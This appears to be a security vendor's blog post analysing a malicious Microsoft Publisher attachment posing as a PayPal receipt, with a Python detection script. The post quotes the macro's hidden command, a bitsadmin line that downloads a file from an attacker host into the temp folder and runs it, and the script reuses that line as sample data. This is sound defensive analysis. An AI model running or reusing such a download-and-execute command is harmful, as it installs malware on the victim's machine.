Analyzing Malware Embedded in MS Publisher Files

Feb 20th 2017

We have started to see malware authors use embedded Visual Basic for Applications (VBA) macros in many unconventional file types to attack hosts. In response to this trend, VMRay Analyzer V 2.0 now supports the analysis of Microsoft Access and Microsoft Publisher files. Support for new sample types means greater coverage of the attack surface, which in turn means greater detection capability.

In this post, we review the analysis of a Publisher file associated with an email from service@paypal.com. The attached file (shown in Figure 1) is disguised as a payment receipt and is titled “FD-Rechnung.pub”.

Analysis

We first drag and drop the email attachment into the VMRay Cloud, where it is immediately recognized as a ‘Microsoft Publisher Document’. On completing the analysis, VMRay Analyzer assigns a severity label of ‘Malicious’ to the sample (Figure 2).

A look at the Overview shows an unusual process tree (see Figure 3). Normally the Microsoft Publisher application (mspub.exe) opens the document and is the only associated process. In this case, however, several other processes are invoked.

After opening the document the following command is executed:

cmd.exe /c bitsadmin /transfer myjob /download
/priority FOREGROUND "hxxp://www.doorasope.top/read.php?f=1.gif"
"%temp%\ltesih.jpg" >nul & "%temp%\ltesih.jpg" & exit

This command is hidden and embedded in the Publisher document as a VBA macro, which is highly obfuscated and normally hard to extract. Figure 4 shows the macro triggering the function “Document_Open()” when the document is opened.

Since VMRay Analyzer monitors every process, we can extract and see the command that is executed after the document is opened (Figure 5). The bitsadmin tool from Microsoft is used to download a file, copy it into the Windows temporary folder and then execute it. The downloaded file can be a Trojan, ransomware or any other malicious file that the malware author wants to use in the attack. In this analysis, the downloaded file is very likely a Trojan/bot that first connects to multiple C&Cs (command-and-control servers).
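
One way to turn the behaviour above into a detection check (an added example, not VMRay's code): it flags a process-creation event whose parent is an Office host and whose command line runs bitsadmin /transfer, and reports whether the downloaded file is then executed by a chained command. The event field names, the Office host names other than mspub.exe and the two benign events are constructed assumptions; the first command line is the one from this post.

```python
import re

# mspub.exe is the host on this page; the other Office names are added assumptions.
OFFICE_HOSTS = {"mspub.exe", "winword.exe", "excel.exe", "msaccess.exe"}
AMP_OUTSIDE_QUOTES = re.compile(r'&(?=(?:[^"]*"[^"]*")*[^"]*$)')
TOKEN = re.compile(r'"([^"]*)"|(\S+)')

def tokens(segment):
    """Split one command into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN.findall(segment)]

def bits_download(cmdline):
    """Return (url, dest, executed) for a bitsadmin /transfer download, else None."""
    segments = AMP_OUTSIDE_QUOTES.split(cmdline)
    for i, segment in enumerate(segments):
        args = tokens(segment)
        lowered = [a.lower() for a in args]
        if "/transfer" not in lowered or not any(
                a.endswith(("bitsadmin", "bitsadmin.exe")) for a in lowered):
            continue
        for j, arg in enumerate(args[:-1]):
            if re.match(r"[a-z]+://", arg, re.I):  # also matches defanged hxxp://
                dest = args[j + 1]
                # Executed if a later chained command starts with the same path.
                ran = any((tokens(s) or [""])[0].lower() == dest.lower()
                          for s in segments[i + 1:])
                return arg, dest, ran
    return None

def detect(events):
    """Return (parent, url, dest, executed) for Office hosts that download via bitsadmin."""
    hits = ((e["parent"].rsplit("\\", 1)[-1].lower(), bits_download(e["cmdline"]))
            for e in events)
    return [(parent, *hit) for parent, hit in hits if parent in OFFICE_HOSTS and hit]

# Constructed events; only the first command line comes from the page.
MSPUB = r"C:\Program Files\Microsoft Office\Office16\MSPUB.EXE"
EVENTS = [
    {"parent": MSPUB, "cmdline": r'cmd.exe /c bitsadmin /transfer myjob /download '
     r'/priority FOREGROUND "hxxp://www.doorasope.top/read.php?f=1.gif" '
     r'"%temp%\ltesih.jpg" >nul & "%temp%\ltesih.jpg" & exit'},
    {"parent": MSPUB, "cmdline": r'"C:\Windows\splwow64.exe" 8192'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'bitsadmin /transfer job1 "https://updates.example.com/a.cab" "C:\a.cab"'},
]

if __name__ == "__main__":
    print(*detect(EVENTS), sep="\n")
```

Only the first event alerts: the second is an Office child process with no download, and the third is a bitsadmin transfer started from a shell rather than from an Office host.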

Conclusion

Microsoft Publisher may not be the most popular file format among malware authors, but its use shows that no file format can be considered safe and free of malicious content. Malware detection and analysis solutions need to cover more of the attack surface by supporting these sample types.

In this analysis, the VTI Score (shown in Figure 6) shows that the Publisher document executes Visual Basic, creates processes and drops files to the system – all of which constitute suspicious behavior.

Malware authors use several methods to try to evade detection and analysis systems. Using lesser-known or infrequently used file types is one such technique.

However, the research team at VMRay is ready to deal with these evasion techniques.